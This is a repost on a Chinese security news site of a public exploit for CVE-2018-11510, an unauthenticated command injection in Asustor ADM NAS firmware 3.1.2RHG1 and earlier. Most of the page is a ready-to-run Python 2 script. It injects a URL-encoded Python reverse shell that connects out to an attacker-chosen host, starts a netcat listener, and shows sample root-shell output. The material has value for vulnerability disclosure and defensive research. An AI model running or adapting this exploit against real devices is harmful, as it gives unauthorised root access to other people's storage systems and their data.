首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ADM 3.1.2RHG1 - Remote Code Execution 来源：@haqur 作者：Fulton 发布时间：2018-08-27   # Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution # Author: Matthew Fulton & Kyle Lovett # Date: 2018-07-01 # Vendor Homepage: https://www.asustor.com/ # Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img # Version: <= ADM 3.1.2RHG1 # Tested on: ASUSTOR AS6202T # CVE : CVE-2018-11510 # References: # http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510   #!/usr/bin/python   """ CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510 This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette if exploitation occurs successfully, a root shell is granted Authors: matthew fulton and Kyle Lovett Date: 27 May 2018 Background: Both Kyle and I found a number of vulnerabilities that we had independently reported to Asustor that Asustor hasn't acknowledge nor apparenlty fixed. After a twitter communication Kyle was kind enough to share a few details exploit created on MacOS system, python 2.7.10, may port to metasploit module soon Vendor link: https://www.asustor.com   Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82 exploit for an unauthenticated OS command injection vulnerability that effects Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha) starting netcat listener on port 1234 /bin/sh: can't access tty; job control turned off /volume0/usr/builtin/webman/portal/apis # uname -a;id /bin/sh: can't access tty; job control turned off /volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) """   import sys, threading, time, os, subprocess import urllib2 import ssl import argparse     class exploit(object):     def __init__(self,interval=1):         self.target = args.target         self.rport = args.port         self.lport = args.lport         self.remote = args.remote         self.interval = interval         thread = threading.Thread(target=self.run, args=())         thread.daemon = True         thread.start()       def run(self):         #ignore ssl warnings         ctx = ssl.create_default_context()         ctx.check_hostname = False         ctx.verify_mode = ssl.CERT_NONE         while True:             try:                 turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \                 "launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \                 "(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \                 "%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \                 "subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"                 response=urllib2.urlopen(turl,context=ctx)                 time.sleep(self.interval)             except urllib2.URLError as e:                 print "Something is wrong:|"                 print e                 os._exit(1)   def revShell():     print "starting netcat listener on port "+args.lport     cmd = "nc -lv {0}".format(args.lport)     os.system(cmd)   def main():     print """exploit for an unauthenticated OS command injection vulnerability that effects Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""     goexploit = exploit()     revShell()   if __name__ == '__main__':     Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise     authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""     parser=argparse.ArgumentParser(description=help)     parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)     parser.add_argument('--port', '-p', default="8001")     parser.add_argument('--lport', '-l', default="1234")     parser.add_argument('--remote','-r', default="192.168.1.253")     args = parser.parse_args()     main()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·CEWE Photoshow 6.3.4 - Denial ·Microsoft Edge Chakra JIT - Im ·OpenSSH 2.3 < 7.7 - Username E ·Microsoft Edge Chakra JIT - Pa ·Mikrotik WinBox 6.42 - Credent ·Microsoft Edge Chakra JIT - 'D ·Central Management Software 1. ·Microsoft Edge Chakra JIT - 'I ·ObserverIP Scan Tool 1.4.0.1 - ·Microsoft Edge Chakra JIT - In ·Foxit Reader 9.0.1.1049 Buffer ·SEIG SCADA System 9 - Remote C   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved